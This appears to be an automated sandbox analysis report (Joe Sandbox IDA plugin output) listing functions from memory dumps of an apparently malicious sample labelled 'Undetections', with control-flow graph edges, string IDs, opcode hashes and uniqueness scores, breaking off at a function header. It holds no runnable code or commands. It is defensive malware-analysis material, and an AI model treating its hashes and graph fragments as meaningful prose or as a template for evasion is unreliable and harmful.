                                                                                                                                                                                                            Function 0F0FF978 Relevance: 5.3, Strings: 4, Instructions: 268COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 2971 f0ff978-f0ff997 2972 f0ff99d-f0ff9bd call f0fe5ec 2971->2972 2973 f0ffac1-f0ffae6 2971->2973 2978 f0ff9bf-f0ff9c2 2972->2978 2979 f0ff9cd-f0ff9d6 2972->2979 2982 f0ffaed-f0ffb19 2973->2982 2978->2979 2981 f0ff9c4-f0ff9c7 2978->2981 3040 f0ff9d8 call f0ff968 2979->3040 3041 f0ff9d8 call f0ff978 2979->3041 3042 f0ff9d8 call f0ffb30 2979->3042 2981->2979 2981->2982 3008 f0ffb20 2982->3008 2983 f0ff9de-f0ff9e0 2985 f0ff9e6-f0ff9f6 2983->2985 2986 f0ffab4-f0ffabe 2983->2986 2987 f0ff9ff-f0ffa04 2985->2987 2988 f0ff9f8-f0ff9fd 2985->2988 2991 f0ffa06-f0ffa12 2987->2991 2992 f0ffa14-f0ffa19 2987->2992 2990 f0ffa2f-f0ffa47 call f0fe5f8 2988->2990 2997 f0ffa4c-f0ffa57 2990->2997 2991->2990 2994 f0ffa1b-f0ffa28 2992->2994 2995 f0ffa2a-f0ffa2c 2992->2995 2994->2990 2995->2990 2999 f0ffa5d-f0ffa70 2997->2999 3000 f0ffb25-f0ffb70 2997->3000 3006 f0ffa72-f0ffaae 2999->3006 3007 f0ffab0-f0ffab2 2999->3007 3004 f0ffb77-f0ffb82 3000->3004 3005 f0ffb72 call f0fe614 3000->3005 3009 f0ffc7c 3004->3009 3010 f0ffb88-f0ffb99 3004->3010 3005->3004 3006->3007 3007->2986 3007->3008 3008->3000 3011 f0ffc81-f0ffc85 3009->3011 3016 f0ffb9f-f0ffbe7 call f0fe620 3010->3016 3017 f0ffc49-f0ffc75 3010->3017 3013 f0ffc99 3011->3013 3014 f0ffc87-f0ffc96 3011->3014 3020 f0ffc9a 3013->3020 3014->3013 3034 f0ffbe9-f0ffc0e 3016->3034 3035 f0ffc10-f0ffc14 3016->3035 3017->3009 3020->3020 3034->3011 3036 f0ffc2d-f0ffc47 3035->3036 3037 f0ffc16-f0ffc28 call f0fe620 3035->3037 3036->3011 3037->3036 3040->2983 3041->2983 3042->2983
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $(&kq$(oq$Hoq
                                                                                                                                                                                                            • API String ID: 0-2837111416
                                                                                                                                                                                                            • Opcode ID: 99f4528fbc5cb9082b15b74d059e91ce0e671fec55dd557eebbc1b64e3b4544d
                                                                                                                                                                                                            • Instruction ID: 5b71ac889b70a810886c5ff902d3981e321ae08aa543d72f2e23742b03c46004
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99f4528fbc5cb9082b15b74d059e91ce0e671fec55dd557eebbc1b64e3b4544d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8791B0B1F002199FDB54DF79C854AAFBBF6EF88300B108529E905EB741DB35A905CB90
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16E2BD98 Relevance: 3.0, Strings: 2, Instructions: 549COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 3536 16e2bd98-16e2bdaa 3538 16e2bdf7-16e2be1c 3536->3538 3539 16e2bdac-16e2bdae 3536->3539 3540 16e2be23-16e2be58 3538->3540 3539->3540 3541 16e2bdb0-16e2bdf4 call 16e26d5c 3539->3541 3554 16e2be7a-16e2be8e 3540->3554 3555 16e2be5a-16e2be78 3540->3555 3557 16e2be90 3554->3557 3558 16e2be95-16e2becb 3554->3558 3555->3554 3557->3558 3559 16e2bed1-16e2bed8 3558->3559 3560 16e2c4e5-16e2c57e call 16e25630 call 16e256d8 call 16e25778 call 16e25818 3558->3560 3559->3559 3561 16e2beda-16e2bedf 3559->3561 3599 16e2c58a-16e2c58b 3560->3599 3563 16e2bef1-16e2bf0e call 16e25630 3561->3563 3564 16e2bee1-16e2beeb 3561->3564 3570 16e2bf14-16e2bf1b 3563->3570 3571 16e2c059-16e2c076 call 16e256d8 3563->3571 3564->3563 3570->3570 3573 16e2bf1d-16e2c058 call 16e25eb8 call 16e2b968 call 16e25eb8 call 16e25630 call 16e25cb0 call 16e2b8e8 call 16e25eb8 call 16e25630 3570->3573 3581 16e2c1c2-16e2c1df call 16e25778 3571->3581 3582 16e2c07c-16e2c083 3571->3582 3573->3571 3593 16e2c1e5-16e2c1ec 3581->3593 3594 16e2c36d-16e2c38a call 16e25818 3581->3594 3582->3582 3586 16e2c085-16e2c1c1 call 16e25eb8 call 16e2b968 call 16e256d8 call 16e2b968 call 16e25cb0 call 16e2b8e8 call 16e256d8 call 16e2b968 3582->3586 3586->3581 3593->3593 3597 16e2c1ee-16e2c2c3 call 16e25eb8 call 16e2b968 call 16e25778 call 16e2b968 call 16e25cb0 call 16e25eb8 call 16e25778 3593->3597 3608 16e2c390-16e2c397 3594->3608 3609 16e2c4de-16e2c4e0 3594->3609 3661 16e2c2c5 3597->3661 3662 16e2c2ca-16e2c2d0 3597->3662 3604 16e2c58c 3599->3604 3610 16e2c58d-16e2c594 3604->3610 3608->3608 3613 16e2c399-16e2c454 call 16e25eb8 call 16e2b968 call 16e25eb8 call 16e25818 call 16e25cb0 call 16e2b8e8 call 16e2b968 call 16e25818 3608->3613 3609->3604 3674 16e2c456 3613->3674 3675 16e2c45b-16e2c45e 3613->3675 3661->3662 3664 16e2c2d2 3662->3664 3665 16e2c2d7-16e2c36c call 16e2b8e8 call 16e25778 call 16e2b968 3662->3665 3664->3665 3665->3594 3674->3675 3677 16e2c460 3675->3677 3678 16e2c465-16e2c4d9 call 16e25eb8 call 16e25818 3675->3678 3677->3678 3678->3610
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (oq$(oq
                                                                                                                                                                                                            • API String ID: 0-3207256227
                                                                                                                                                                                                            • Opcode ID: 4a4175894040c7872e10914c20abe348ed697243b806b2e8c52d3bae10d13a38
                                                                                                                                                                                                            • Instruction ID: 3d4b4649e91b822083ad9ccb7d0714a3f1ea5b6d356f213e35c1cedc6cb94e01
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a4175894040c7872e10914c20abe348ed697243b806b2e8c52d3bae10d13a38
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE320935D002199FCF11DFA4DC50AEDBBB6FF55300F5192AAE51967260EB30AA99CF80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EAA6C0 Relevance: 3.0, Strings: 2, Instructions: 521COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 3689 4eaa6c0-4eaa6eb 3690 4eaa6ed 3689->3690 3691 4eaa6f2-4eaa796 3689->3691 3690->3691 3694 4eaa798-4eaa79f 3691->3694 3695 4eaa7f9-4eaa84c 3691->3695 3694->3694 3696 4eaa7a1-4eaa7a6 3694->3696 3705 4eaa852-4eaa859 3695->3705 3698 4eaa7b8-4eaa7f7 3696->3698 3699 4eaa7a8-4eaa7b2 3696->3699 3698->3705 3699->3698 3706 4eaa85b-4eaa867 3705->3706 3707 4eaa883 3705->3707 3708 4eaa869-4eaa86f 3706->3708 3709 4eaa871-4eaa877 3706->3709 3710 4eaa889-4eaa8c9 3707->3710 3711 4eaa881 3708->3711 3709->3711 3714 4eaae2b-4eaae37 3710->3714 3711->3710 3715 4eaa8ce-4eaa8da 3714->3715 3716 4eaae3d-4eaae44 3714->3716 3718 4eaa8dc 3715->3718 3719 4eaa8e1-4eaa900 3715->3719 3716->3716 3717 4eaae46-4eaae4d 3716->3717 3718->3719 3721 4eaa94a-4eaa9bf 3719->3721 3722 4eaa902-4eaa909 3719->3722 3733 4eaaa20-4eaaa5b 3721->3733 3734 4eaa9c1-4eaa9c8 3721->3734 3722->3722 3723 4eaa90b-4eaa945 3722->3723 3728 4eaae03-4eaae28 3723->3728 3728->3714 3740 4eaaa63-4eaaa6b 3733->3740 3734->3734 3735 4eaa9ca-4eaaa1e 3734->3735 3735->3740 3742 4eaaabc-4eaaac2 3740->3742 3743 4eaaa6d-4eaaa8c 3742->3743 3744 4eaaac4-4eaab87 3742->3744 3745 4eaaa8e 3743->3745 3746 4eaaa93-4eaaab9 3743->3746 3755 4eaab89-4eaab90 3744->3755 3756 4eaabd1-4eaabd5 3744->3756 3745->3746 3746->3742 3755->3755 3757 4eaab92-4eaabcb 3755->3757 3758 4eaac1f-4eaac23 3756->3758 3759 4eaabd7-4eaabde 3756->3759 3757->3756 3761 4eaac6d-4eaac71 3758->3761 3762 4eaac25-4eaac2c 3758->3762 3759->3759 3760 4eaabe0-4eaac19 3759->3760 3760->3758 3764 4eaacd3-4eaad00 3761->3764 3765 4eaac73-4eaac7b 3761->3765 3762->3762 3763 4eaac2e-4eaac67 3762->3763 3763->3761 3773 4eaad02-4eaad35 3764->3773 3774 4eaad37-4eaad61 3764->3774 3767 4eaacc2-4eaacc8 3765->3767 3770 4eaacca-4eaacd1 3767->3770 3771 4eaac7d-4eaacbf 3767->3771 3770->3764 3770->3770 3771->3767 3778 4eaad6a-4eaade9 3773->3778 3774->3778 3783 4eaadf0-4eaadfd 3778->3783 3783->3728
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 4'kq$poq
                                                                                                                                                                                                            • API String ID: 0-937253537
                                                                                                                                                                                                            • Opcode ID: 4b4289f4f3d4e05a65eeebfbd1a6126c99a33da6946436b0fc5af32a687e1362
                                                                                                                                                                                                            • Instruction ID: 5fc65ca36399c5af559c4f492e1b5825b0b26a065bb17232d4149a09b610e633
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b4289f4f3d4e05a65eeebfbd1a6126c99a33da6946436b0fc5af32a687e1362
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4932DE75A00218DFDB15CFA8C980E99BBB2FF49304F0580E9E509AB365DB31AE91DF50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FBDD08 Relevance: 2.9, Instructions: 2857COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 9946694c086e6d6b5fb3071263bd3031853da18111724fc3d6408ad874a6787a
                                                                                                                                                                                                            • Instruction ID: 77cad0af533450d20d4b1dff8d33082dfea1355bdae02f544c90750dab8b8bb1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9946694c086e6d6b5fb3071263bd3031853da18111724fc3d6408ad874a6787a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A737D38A41629CFCB29DF24C99C899BBB1FF49305F1145EAE509A7360DB35AE85CF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DEBA51 Relevance: 1.9, Strings: 1, Instructions: 695COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: fff?
                                                                                                                                                                                                            • API String ID: 0-4136771917
                                                                                                                                                                                                            • Opcode ID: f11056f59697bca9bf909b745535e0a300c67d6ad6c44f063c92d520e4d55cdb
                                                                                                                                                                                                            • Instruction ID: 4d41b696b7a3742afcdffaadf80fe1b8613ef516e157204ecfd78edf5345cbac
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f11056f59697bca9bf909b745535e0a300c67d6ad6c44f063c92d520e4d55cdb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB623C35800A1ADFCF11DF60C884AD9B7B2FF99300F1586D5E9086B165E775AAD9CF80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0FC881 Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 251d70c9220e376c29f18216854a68ba2bf3eada75cbbcc528819c13e8860c2a
                                                                                                                                                                                                            • Instruction ID: c674e4aebeb3de93fd5706dff3d1c53d281ce8cadae3e93716129321da12c93b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 251d70c9220e376c29f18216854a68ba2bf3eada75cbbcc528819c13e8860c2a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35D14130A00209CFEB14DFA5C949BADBBF1BF88304F55C154D505AF6A6DB74EA49CB80
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE2244 Relevance: .9, Instructions: 928COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 458010668b0eb27ccc2d2d1a0ed838b40a1a4f0b72f53772e49fdc54c4e00a5c
                                                                                                                                                                                                            • Instruction ID: 31dd8177c9382fc4120706a8edb190b97163d78002a46eafcad16fee0dbe9313
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 458010668b0eb27ccc2d2d1a0ed838b40a1a4f0b72f53772e49fdc54c4e00a5c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC92E335900628DFCB26DF64C848AD9BBB6FF4A311F0591D9E50DAB260DB31AB94DF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16E2F2A0 Relevance: .5, Instructions: 498COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 9693445c5f55602bc0d74705db22d3375fb2e51e9f506326bcfa64b9dbd51ae3
                                                                                                                                                                                                            • Instruction ID: bff947f00963c5c3bb727e2257628b18ebf28b4b4587de4fd38dfe740c2163d6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9693445c5f55602bc0d74705db22d3375fb2e51e9f506326bcfa64b9dbd51ae3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B122974E541298FEB10DFA9C984BADBBB2FB49304F5096A9D409B7390D7309D89CF60
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EAC420 Relevance: .5, Instructions: 491COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: efad9eefc62270822170c6080d0d765496b5697889317c31c91c33f374bc4440
                                                                                                                                                                                                            • Instruction ID: e03ce1bd818b709828279f32167c3f13c457e88209b9c64ccbd841186d57eafc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: efad9eefc62270822170c6080d0d765496b5697889317c31c91c33f374bc4440
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1232C474E012198FDB64DF69D845B9DBBB2FF89300F1091AAE809A7354DB346E85CF50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE3078 Relevance: .4, Instructions: 446COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 05406529c3b5328c412de1ee7decb1ca970d3721fd5b5144ed4f6002f22755c7
                                                                                                                                                                                                            • Instruction ID: 17e0e149b326b926364db12c41bf0966eadb48d5c45e55c58282c7b9bf44f5ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05406529c3b5328c412de1ee7decb1ca970d3721fd5b5144ed4f6002f22755c7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D12F635900629DFCB16DF64C848AD9BBB6FF4A301F0181E5E50DAB261DB72AB94DF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE2FD8 Relevance: .4, Instructions: 420COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 5acfcd8f828c3ccdf16e13523e4bcfdcba321d24b637a4d31456000a750a1f84
                                                                                                                                                                                                            • Instruction ID: ad9826152409ad4e707443ff14f9ede803d2a92c223cdac0c664b0c21a6910c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5acfcd8f828c3ccdf16e13523e4bcfdcba321d24b637a4d31456000a750a1f84
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67120735E10619DFCB11EF64C844BD9BBB1FF9A300F1186AAE5097B260EB709A94DF41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16E24FA3 Relevance: .4, Instructions: 405COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4314104630.0000000016E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 16E20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16e20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 54c02a33bbf91f772b16da93d912c3ea5462f3042da456a50fa354d5e5371f93
                                                                                                                                                                                                            • Instruction ID: 5a246efecfc7519bd45aeef9ff788126fa52497e384ed9eece59126ff7c391d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54c02a33bbf91f772b16da93d912c3ea5462f3042da456a50fa354d5e5371f93
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03123B35C00619DFCF11DFA0D854ADDBBB1FF69311F1092AAE90AA7260EB349A95DF40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EAC410 Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 2e72cd7af0d06a972740430b07482d2f3b3b24a7959d129341ef02792080c387
                                                                                                                                                                                                            • Instruction ID: 361a1bbda6366e8fa6cf46e66af4aa3c5bb441753c8ecdd164f9708f21877ea5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e72cd7af0d06a972740430b07482d2f3b3b24a7959d129341ef02792080c387
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E12B674E012188FEB64DF69D945B9DBBF2FB89300F1091AAE909A7350DB346E85CF50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE76BB Relevance: .4, Instructions: 387COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7c03254ffd143de1402b6d21f65c0d70f995779fd55bf251fcebad85b4a21ade
                                                                                                                                                                                                            • Instruction ID: 73cd5445c7c388d2858246ec87e6a8f2f8450b8a68ff407dd79022f441686cfb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c03254ffd143de1402b6d21f65c0d70f995779fd55bf251fcebad85b4a21ade
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44020835E10619DFCB11DF64C844BD9BBB1FF9A300F1182AAE5097B260EB709A94DF41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 07943B40 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 75f090cfa4e78541104796769adc72a06f3fd75c785ae74d5fa8a84953e3036b
                                                                                                                                                                                                            • Instruction ID: a2620a436389c3bfd399adb0caaf33efbbaa0eb9de4be9a15191154f9b594250
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75f090cfa4e78541104796769adc72a06f3fd75c785ae74d5fa8a84953e3036b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9C15CB0E00255DFDF14CFA9C980B9ABBF2AF88314F14C5AAD409AB255DB34E985CF50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EA4898 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a8c45df5120bd053b2c3b57718c55e3702580cf426f4fbdc4df0b83b00afd48e
                                                                                                                                                                                                            • Instruction ID: c67c212868842b5fd15acf9764afb661c06e5e25f0b155ef1a70d0570854c478
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8c45df5120bd053b2c3b57718c55e3702580cf426f4fbdc4df0b83b00afd48e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56B1AD34E0034A8FCB05DFA4D854ADDBBBAFF8A300B158256E415AF3A5EB70B955CB50
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EAA6B1 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 98adc0a4e1165101ab5f3b143c93d06096a2e8106c757d334784135802d27632
                                                                                                                                                                                                            • Instruction ID: 195ad9ca24f1f02e68d20700b8b642b5ced809886e8344ac6b442a14baa3ceea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98adc0a4e1165101ab5f3b143c93d06096a2e8106c757d334784135802d27632
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF51EA75E052188FDB14CF6AD940BDEBBF2AF89300F04D1B6D508AB254EB306A95CF51
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 16DE2A98 Relevance: .1, Instructions: 118COMMON
